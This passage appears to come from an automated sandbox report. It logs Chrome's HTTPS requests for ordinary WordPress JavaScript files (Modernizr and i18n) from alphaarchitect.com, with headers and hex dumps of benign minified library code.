                                                                                                                                                                                                                                                                        Data Ascii: or(){this.actions=Object.create(null),this.actions.__current=new Set,this.filters=Object.create(null),this.filters.__current=new Set,this.addAction=o(this,"actions"),this.addFilter=o(this,"filters"),this.removeAction=i(this,"actions"),this.removeFilter=i(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        32192.168.2.449782141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC618OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/modernizr.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-466f"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147806
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9d35cb042be-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC877INData Raw: 34 36 36 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 6f 29 7b 76 61 72 20 72 3d 5b 5d 2c 61 3d 7b 5f 76 65 72 73 69 6f 6e 3a 22 33 2e 31 32 2e 30 22 2c 5f 63 6f 6e 66 69 67 3a 7b 63 6c 61 73 73 50 72 65 66 69 78 3a 22 22 2c 65 6e 61 62 6c 65 43 6c 61 73 73 65 73 3a 21 30 2c 65 6e 61 62 6c 65 4a 53 43 6c 61 73 73 3a 21 30 2c 75 73 65 50 72 65 66 69 78 65 73 3a 21 30 7d 2c 5f 71 3a 5b 5d 2c 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 6e 5b 65 5d 29 7d 2c 30 29 7d 2c 61 64 64 54 65 73 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 2e 70 75 73 68 28 7b 6e 61 6d 65 3a 65 2c 66 6e 3a 74 2c 6f 70 74 69 6f 6e 73 3a 6e 7d 29 7d 2c
                                                                                                                                                                                                                                                                        Data Ascii: 466f!function(e,t,n,o){var r=[],a={_version:"3.12.0",_config:{classPrefix:"",enableClasses:!0,enableJSClass:!0,usePrefixes:!0},_q:[],on:function(e,t){var n=this;setTimeout(function(){t(n[e])},0)},addTest:function(e,t,n){r.push({name:e,fn:t,options:n})},
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 5b 6f 5b 31 5d 5d 29 2c 76 6f 69 64 20 30 21 3d 3d 72 29 72 65 74 75 72 6e 20 69 3b 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 3f 74 28 29 3a 74 2c 31 3d 3d 3d 6f 2e 6c 65 6e 67 74 68 3f 69 5b 6f 5b 30 5d 5d 3d 74 3a 28 21 69 5b 6f 5b 30 5d 5d 7c 7c 69 5b 6f 5b 30 5d 5d 69 6e 73 74 61 6e 63 65 6f 66 20 42 6f 6f 6c 65 61 6e 7c 7c 28 69 5b 6f 5b 30 5d 5d 3d 6e 65 77 20 42 6f 6f 6c 65 61 6e 28 69 5b 6f 5b 30 5d 5d 29 29 2c 69 5b 6f 5b 30 5d 5d 5b 6f 5b 31 5d 5d 3d 74 29 2c 66 28 5b 28 74 26 26 21 31 21 3d 3d 74 3f 22 22 3a 22 6e 6f 2d 22 29 2b 6f 2e 6a 6f 69 6e 28 22 2d 22 29 5d 29 2c 69 2e 5f 74 72 69 67 67 65 72 28 65 2c 74 29 7d 72 65 74 75 72 6e 20 69 7d 6c 3d 63 28 64 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 22 75
                                                                                                                                                                                                                                                                        Data Ascii: [o[1]]),void 0!==r)return i;t="function"==typeof t?t():t,1===o.length?i[o[0]]=t:(!i[o[0]]||i[o[0]]instanceof Boolean||(i[o[0]]=new Boolean(i[o[0]])),i[o[0]][o[1]]=t),f([(t&&!1!==t?"":"no-")+o.join("-")]),i._trigger(e,t)}return i}l=c(d={}.hasOwnProperty,"u
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 21 28 22 6f 6e 62 6c 75 72 22 69 6e 20 75 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 72 3b 72 65 74 75 72 6e 21 21 74 26 26 28 6e 26 26 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 6e 7c 7c 28 6e 3d 79 28 6e 7c 7c 22 64 69 76 22 29 29 2c 21 28 72 3d 28 74 3d 22 6f 6e 22 2b 74 29 69 6e 20 6e 29 26 26 65 26 26 28 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65 7c 7c 28 6e 3d 79 28 22 64 69 76 22 29 29 2c 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 74 2c 22 22 29 2c 72 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 74 5d 2c 6e 5b 74 5d 21 3d 3d 6f 26 26 28 6e 5b 74 5d 3d 6f 29 2c 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 74 29 29 2c 72 29 7d 7d
                                                                                                                                                                                                                                                                        Data Ascii: nction(){var e=!("onblur"in u);return function(t,n){var r;return!!t&&(n&&"string"!=typeof n||(n=y(n||"div")),!(r=(t="on"+t)in n)&&e&&(n.setAttribute||(n=y("div")),n.setAttribute(t,""),r="function"==typeof n[t],n[t]!==o&&(n[t]=o),n.removeAttribute(t)),r)}}
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 65 6e 74 2c 74 2e 63 72 65 61 74 65 46 72 61 67 3d 65 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 2c 74 2e 66 72 61 67 3d 74 2e 63 72 65 61 74 65 46 72 61 67 28 29 29 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 68 2e 73 68 69 76 4d 65 74 68 6f 64 73 3f 66 28 6e 2c 65 2c 74 29 3a 74 2e 63 72 65 61 74 65 45 6c 65 6d 28 6e 29 7d 2c 65 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 3d 46 75 6e 63 74 69 6f 6e 28 22 68 2c 66 22 2c 22 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 66 2e 63 6c 6f 6e 65 4e 6f 64 65 28 29 2c 63 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 3b 68 2e 73 68 69 76 4d 65 74 68 6f 64 73 26 26 28 22 2b
                                                                                                                                                                                                                                                                        Data Ascii: ent,t.createFrag=e.createDocumentFragment,t.frag=t.createFrag()),e.createElement=function(n){return h.shivMethods?f(n,e,t):t.createElem(n)},e.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 6d 6c 35 3d 68 2c 6d 28 74 29 3b 76 61 72 20 76 2c 67 3d 2f 5e 24 7c 5c 62 28 3f 3a 61 6c 6c 7c 70 72 69 6e 74 29 5c 62 2f 2c 79 3d 22 68 74 6d 6c 35 73 68 69 76 22 2c 54 3d 21 28 6f 7c 7c 28 76 3d 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 76 6f 69 64 20 30 3d 3d 3d 74 2e 6e 61 6d 65 73 70 61 63 65 73 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 2e 70 61 72 65 6e 74 57 69 6e 64 6f 77 7c 7c 76 6f 69 64 20 30 3d 3d 3d 76 2e 61 70 70 6c 79 45 6c 65 6d 65 6e 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 76 2e 72 65 6d 6f 76 65 4e 6f 64 65 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 2e 61 74 74 61 63 68 45 76 65 6e 74 29 29 3b 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6f 3d 6e 2e 6c 65 6e 67 74 68 2c
                                                                                                                                                                                                                                                                        Data Ascii: ml5=h,m(t);var v,g=/^$|\b(?:all|print)\b/,y="html5shiv",T=!(o||(v=t.documentElement,void 0===t.namespaces||void 0===t.parentWindow||void 0===v.applyElement||void 0===v.removeNode||void 0===e.attachEvent));function b(e){for(var t,n=e.attributes,o=n.length,
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 6e 28 29 7b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 6c 65 6e 67 74 68 3b 74 2d 2d 3b 29 65 5b 74 5d 2e 72 65 6d 6f 76 65 4e 6f 64 65 28 29 7d 28 6e 29 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6f 2e 5f 72 65 6d 6f 76 65 53 68 65 65 74 54 69 6d 65 72 29 2c 6f 2e 5f 72 65 6d 6f 76 65 53 68 65 65 74 54 69 6d 65 72 3d 73 65 74 54 69 6d 65 6f 75 74 28 69 2c 35 30 30 29 7d 29 2c 65 2e 70 72 69 6e 74 53 68 69 76 65 64 3d 21 30 2c 65 7d 68 2e 74 79 70 65 2b 3d 22 20 70 72 69 6e 74 22 2c 68 2e 73 68 69 76 50 72 69 6e 74 3d 78 2c 78 28 74 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 26 26 28 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 68 29 7d 28 76 6f
                                                                                                                                                                                                                                                                        Data Ascii: n(){!function(e){for(var t=e.length;t--;)e[t].removeNode()}(n),clearTimeout(o._removeSheetTimer),o._removeSheetTimer=setTimeout(i,500)}),e.printShived=!0,e}h.type+=" print",h.shivPrint=x,x(t),"object"==typeof module&&module.exports&&(module.exports=h)}(vo
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 72 67 75 6d 65 6e 74 73 29 29 7d 2c 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 3f 22 77 61 72 6e 22 3a 22 6c 6f 67 22 3b 74 2e 63 6f 6e 73 6f 6c 65 5b 65 5d 2e 61 70 70 6c 79 28 74 2e 63 6f 6e 73 6f 6c 65 2c 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 29 7d 29 2c 61 2e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 79 65 70 6e 6f 70 65 22 69 6e 20 74 3f 28 78 28 22 79 65 70 6e 6f 70 65 2e 6a 73 20 28 61 6b 61 20 4d 6f 64 65 72 6e 69 7a 72 2e 6c 6f 61 64 29 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 69 6e 63 6c 75 64 65 64 20 61 73 20 70 61 72 74 20 6f 66 20 4d 6f 64 65 72 6e 69 7a 72 2e 20 79 65 70 6e 6f 70 65 20 61 70 70 65 61 72 73 20
                                                                                                                                                                                                                                                                        Data Ascii: rguments))},x=function(){var e=console.warn?"warn":"log";t.console[e].apply(t.console,Array.prototype.slice.call(arguments))}),a.load=function(){"yepnope"in t?(x("yepnope.js (aka Modernizr.load) is no longer included as part of Modernizr. yepnope appears
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 61 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 65 2e 6c 65 6e 67 74 68 3b 69 66 28 22 43 53 53 22 69 6e 20 74 26 26 22 73 75 70 70 6f 72 74 73 22 69 6e 20 74 2e 43 53 53 29 7b 66 6f 72 28 3b 72 2d 2d 3b 29 69 66 28 74 2e 43 53 53 2e 73 75 70 70 6f 72 74 73 28 7a 28 65 5b 72 5d 29 2c 6e 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 69 66 28 22 43 53 53 53 75 70 70 6f 72 74 73 52 75 6c 65 22 69 6e 20 74 29 7b 66 6f 72 28 76 61 72 20 61 3d 5b 5d 3b 72 2d 2d 3b 29 61 2e 70 75 73 68 28 22 28 22 2b 7a 28 65 5b 72 5d 29 2b 22 3a 22 2b 6e 2b 22 29 22 29 3b 72 65 74 75 72 6e 20 77 28 22 40 73 75 70 70 6f 72 74 73 20 28 22 2b 28 61 3d 61 2e 6a 6f 69 6e 28 22 20 6f 72 20 22 29 29 2b 22 29 20 7b 20 23 6d 6f 64 65 72 6e 69 7a
                                                                                                                                                                                                                                                                        Data Ascii: ar i=function(e,n){var r=e.length;if("CSS"in t&&"supports"in t.CSS){for(;r--;)if(t.CSS.supports(z(e[r]),n))return!0;return!1}if("CSSSupportsRule"in t){for(var a=[];r--;)a.push("("+z(e[r])+":"+n+")");return w("@supports ("+(a=a.join(" or "))+") { #moderniz
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 70 6c 69 74 28 22 20 22 29 3a 5b 22 22 2c 22 22 5d 3b 61 2e 5f 70 72 65 66 69 78 65 73 3d 4f 3b 61 2e 70 72 65 66 69 78 65 64 43 53 53 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 41 28 65 29 3b 72 65 74 75 72 6e 20 74 26 26 7a 28 74 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 52 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 28 65 2c 6f 2c 6f 2c 74 2c 6e 29 7d 61 2e 74 65 73 74 41 6c 6c 50 72 6f 70 73 3d 52 3b 76 61 72 20 4c 3d 61 2e 74 65 73 74 50 72 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 4d 28 5b 65 5d 2c 6f 2c 74 2c 6e 29 7d 2c 42 3d 61 2e 74 65 73 74 53 74 79 6c 65 73 3d 77 3b 69 2e 61 64 64 54 65 73 74 28 22 74 6f 75 63 68 65 76 65 6e 74 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 6f 6e 74 6f 75
                                                                                                                                                                                                                                                                        Data Ascii: plit(" "):["",""];a._prefixes=O;a.prefixedCSS=function(e){var t=A(e);return t&&z(t)};function R(e,t,n){return j(e,o,o,t,n)}a.testAllProps=R;var L=a.testProp=function(e,t,n){return M([e],o,t,n)},B=a.testStyles=w;i.addTest("touchevents",function(){if("ontou
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 68 61 73 68 63 68 61 6e 67 65 22 2c 74 29 26 26 28 6e 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 3d 3d 3d 6f 7c 7c 6e 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 3e 37 29 7d 29 2c 69 2e 61 64 64 54 65 73 74 28 22 67 65 6f 6c 6f 63 61 74 69 6f 6e 22 2c 22 67 65 6f 6c 6f 63 61 74 69 6f 6e 22 69 6e 20 6e 61 76 69 67 61 74 6f 72 29 2c 69 2e 61 64 64 54 65 73 74 28 22 68 69 73 74 6f 72 79 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 3b 72 65 74 75 72 6e 21 21 65 26 26 28 28 2d 31 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 41 6e 64 72 6f 69 64 20 32 2e 22 29 26 26 2d 31 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 41 6e 64 72 6f 69 64 20 34 2e 30 22 29 7c 7c 2d 31 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22
                                                                                                                                                                                                                                                                        Data Ascii: hashchange",t)&&(n.documentMode===o||n.documentMode>7)}),i.addTest("geolocation","geolocation"in navigator),i.addTest("history",function(){var e=navigator.userAgent;return!!e&&((-1===e.indexOf("Android 2.")&&-1===e.indexOf("Android 4.0")||-1===e.indexOf("


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        33192.168.2.449787141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC779OUTGET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 14 Nov 2024 00:24:52 GMT
                                                                                                                                                                                                                                                                        ETag: W/"67354354-23b5"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147805
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9d37fc60f95-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC877INData Raw: 32 33 62 35 0d 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 76 61 72 20 74 3d 7b 32 30 35 38 3a 28 74 2c 65 2c 72 29 3d 3e 7b 76 61 72 20 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 3d 7b 6e 6f 74 5f 73 74 72 69 6e 67 3a 2f 5b 5e 73 5d 2f 2c 6e 6f 74 5f 62 6f 6f 6c 3a 2f 5b 5e 74 5d 2f 2c 6e 6f 74 5f 74 79 70 65 3a 2f 5b 5e 54 5d 2f 2c 6e 6f 74 5f 70 72 69 6d 69 74 69 76 65 3a 2f 5b 5e 76 5d 2f 2c 6e 75 6d 62 65 72 3a 2f 5b 64 69 65 66 67 5d 2f 2c 6e 75 6d 65 72 69 63 5f 61 72 67 3a 2f 5b 62 63 64 69 65 66 67 75 78 58 5d 2f 2c 6a 73 6f 6e 3a 2f 5b 6a 5d 2f 2c 6e 6f 74 5f 6a 73 6f 6e 3a 2f 5b 5e 6a 5d 2f 2c 74 65 78 74 3a 2f
                                                                                                                                                                                                                                                                        Data Ascii: 23b5/*! This file is auto-generated */(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 5f 74 79 70 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 69 2e 6e 6f 74 5f 70 72 69 6d 69 74 69 76 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 46 75 6e 63 74 69 6f 6e 26 26 28 72 3d 72 28 29 29 2c 69 2e 6e 75 6d 65 72 69 63 5f 61 72 67 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 72 26 26 69 73 4e 61 4e 28 72 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 61 28 22 5b 73 70 72 69 6e 74 66 5d 20 65 78 70 65 63 74 69 6e 67 20 6e 75 6d 62 65 72 20 62 75 74 20 66 6f 75 6e 64 20 25 54 22 2c 72 29 29 3b 73 77 69 74 63 68 28 69 2e 6e 75 6d 62 65 72 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 28 63 3d 72 3e 3d 30 29 2c 73 2e 74 79 70 65 29 7b 63 61
                                                                                                                                                                                                                                                                        Data Ascii: _type.test(s.type)&&i.not_primitive.test(s.type)&&r instanceof Function&&(r=r()),i.numeric_arg.test(s.type)&&"number"!=typeof r&&isNaN(r))throw new TypeError(a("[sprintf] expecting number but found %T",r));switch(i.number.test(s.type)&&(c=r>=0),s.type){ca
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 3d 73 2e 70 61 64 5f 63 68 61 72 3f 22 30 22 3a 73 2e 70 61 64 5f 63 68 61 72 2e 63 68 61 72 41 74 28 31 29 3a 22 20 22 2c 70 3d 73 2e 77 69 64 74 68 2d 28 66 2b 72 29 2e 6c 65 6e 67 74 68 2c 6c 3d 73 2e 77 69 64 74 68 26 26 70 3e 30 3f 75 2e 72 65 70 65 61 74 28 70 29 3a 22 22 2c 67 2b 3d 73 2e 61 6c 69 67 6e 3f 66 2b 72 2b 6c 3a 22 30 22 3d 3d 3d 75 3f 66 2b 6c 2b 72 3a 6c 2b 66 2b 72 29 7d 72 65 74 75 72 6e 20 67 7d 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 73 5b 74 5d 29 72 65 74 75 72 6e 20 73 5b 74 5d 3b 76 61 72 20 65 2c 72 3d 74 2c 6e 3d 5b 5d 2c 61 3d 30 3b 66 6f 72 28 3b 72 3b 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 28 65 3d 69 2e 74 65 78 74 2e 65 78 65 63 28 72 29 29 29 6e 2e 70 75 73 68 28 65 5b 30 5d 29 3b 65 6c 73 65 20 69 66 28 6e 75 6c
                                                                                                                                                                                                                                                                        Data Ascii: =s.pad_char?"0":s.pad_char.charAt(1):" ",p=s.width-(f+r).length,l=s.width&&p>0?u.repeat(p):"",g+=s.align?f+r+l:"0"===u?f+l+r:l+f+r)}return g}(function(t){if(s[t])return s[t];var e,r=t,n=[],a=0;for(;r;){if(null!==(e=i.text.exec(r)))n.push(e[0]);else if(nul
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 20 61 3d 65 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 6e 5d 28 61 2c 61 2e 65 78 70 6f 72 74 73 2c 72 29 2c 61 2e 65 78 70 6f 72 74 73 7d 72 2e 6e 3d 74 3d 3e 7b 76 61 72 20 65 3d 74 26 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 28 29 3d 3e 74 2e 64 65 66 61 75 6c 74 3a 28 29 3d 3e 74 3b 72 65 74 75 72 6e 20 72 2e 64 28 65 2c 7b 61 3a 65 7d 29 2c 65 7d 2c 72 2e 64 3d 28 74 2c 65 29 3d 3e 7b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 65 29 72 2e 6f 28 65 2c 6e 29 26 26 21 72 2e 6f 28 74 2c 6e 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6e 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 65 5b 6e 5d 7d 29 7d 2c 72 2e 6f 3d 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f
                                                                                                                                                                                                                                                                        Data Ascii: a=e[n]={exports:{}};return t[n](a,a.exports,r),a.exports}r.n=t=>{var e=t&&t.__esModule?()=>t.default:()=>t;return r.d(e,{a:e}),e},r.d=(t,e)=>{for(var n in e)r.o(e,n)&&!r.o(t,n)&&Object.defineProperty(t,n,{enumerable:!0,get:e[n]})},r.o=(t,e)=>Object.proto
